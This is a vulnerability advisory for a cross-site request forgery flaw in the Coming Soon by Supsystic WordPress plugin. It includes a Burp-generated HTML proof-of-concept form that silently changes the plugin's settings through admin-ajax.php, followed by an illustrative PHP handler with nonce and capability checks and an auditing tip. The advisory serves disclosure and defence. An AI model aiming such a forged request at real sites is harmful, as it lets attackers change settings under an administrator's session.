
CVE-2023-22714

Details

Details about the software affected by CVE-2023-22714.

Parameter           Description
Software            Coming Soon by Supsystic
Type                WordPress Plugin
Vulnerable Version  <= 1.7.10
Classification      Cross Site Request Forgery (CSRF)
Required privilege  Unauthenticated
Publicly disclosed  19.01.2023
Plugin URL          https://wordpress.org/plugins/coming-soon-by-supsystic/

Researcher

This vulnerability was discovered by @yuyudhn.

Description

yuyudhn discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in the WordPress plugin Coming Soon by Supsystic. It could allow a malicious actor to force higher-privileged users to execute unwanted actions under their current authentication, for example a password change, which would then allow the malicious actor to log in to the admin account. No fix for this vulnerability is known at this time.

Proof of Concept

CSRF Update Settings:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="opt&#95;values&#91;cs&#95;mode&#93;" value="dsbl" />
      <input type="hidden" name="opt&#95;values&#91;exclude&#95;or&#95;show&#95;links&#93;" value="CSRF&#32;Change&#32;Value" />
      <input type="hidden" name="mod" value="options" />
      <input type="hidden" name="action" value="saveGroup" />
      <input type="hidden" name="pl" value="scs" />
      <input type="hidden" name="reqType" value="ajax" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
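The PoC above works because the plugin's admin-ajax "saveGroup" handler accepts the posted settings without a request token tied to the logged-in user. The following is an added example of how a WordPress AJAX settings handler is normally protected; it is not the Supsystic plugin's code, and the action name, option names and the set of allowed cs_mode values are assumptions. It shows the two checks a reviewer would look for: a nonce check (which a cross-site form cannot satisfy, since the attacker's page does not know the victim's nonce) and a capability check, followed by sanitizing the values before they are stored.

```php
<?php
// Added example, not code from the Coming Soon by Supsystic plugin.
// All hook, function and option names here are hypothetical.

// Register the handler for logged-in users only (no 'wp_ajax_nopriv_' hook),
// so anonymous requests never reach it.
add_action( 'wp_ajax_example_save_group', 'example_save_group' );

function example_save_group() {
    // 1. Nonce check. check_ajax_referer() looks for '_ajax_nonce' (or
    //    '_wpnonce') in the request and terminates with HTTP 403 when the
    //    nonce is missing or was not issued for this user and action.
    //    A forged cross-site form, like the PoC, cannot supply it.
    check_ajax_referer( 'example_save_group', '_ajax_nonce' );

    // 2. Capability check. A valid nonce proves intent, not authorization;
    //    only users allowed to manage options may change the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Whitelist and sanitize what was posted before persisting it.
    //    The request shape (opt_values[cs_mode], opt_values[exclude_or_show_links])
    //    mirrors the PoC; the allowed cs_mode values are an assumption.
    $raw = array();
    if ( isset( $_POST['opt_values'] ) && is_array( $_POST['opt_values'] ) ) {
        $raw = wp_unslash( $_POST['opt_values'] );
    }

    $allowed_modes = array( 'enbl', 'dsbl' ); // assumed
    $mode = isset( $raw['cs_mode'] ) && in_array( $raw['cs_mode'], $allowed_modes, true )
        ? $raw['cs_mode']
        : 'dsbl';
    $links = isset( $raw['exclude_or_show_links'] )
        ? sanitize_text_field( $raw['exclude_or_show_links'] )
        : '';

    update_option( 'example_cs_mode', $mode );
    update_option( 'example_exclude_or_show_links', $links );

    wp_send_json_success( array( 'cs_mode' => $mode ) );
}

// The plugin's own settings form must embed the matching nonce so that
// legitimate submissions from the admin screen pass the check above.
function example_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    wp_nonce_field( 'example_save_group', '_ajax_nonce' );
    echo '<input type="hidden" name="action" value="example_save_group" />';
    echo '<select name="opt_values[cs_mode]">';
    echo '<option value="enbl">Enabled</option><option value="dsbl">Disabled</option>';
    echo '</select>';
    echo '<input type="text" name="opt_values[exclude_or_show_links]" value="" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}
```

When auditing a plugin for this class of bug, the quick test is to remove the nonce parameter from a legitimate settings request (or replay the request from a page on another origin, as the Burp-generated PoC does) and confirm the server rejects it; a handler that still applies the change has no request-origin binding and is CSRF-able regardless of the victim's role.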
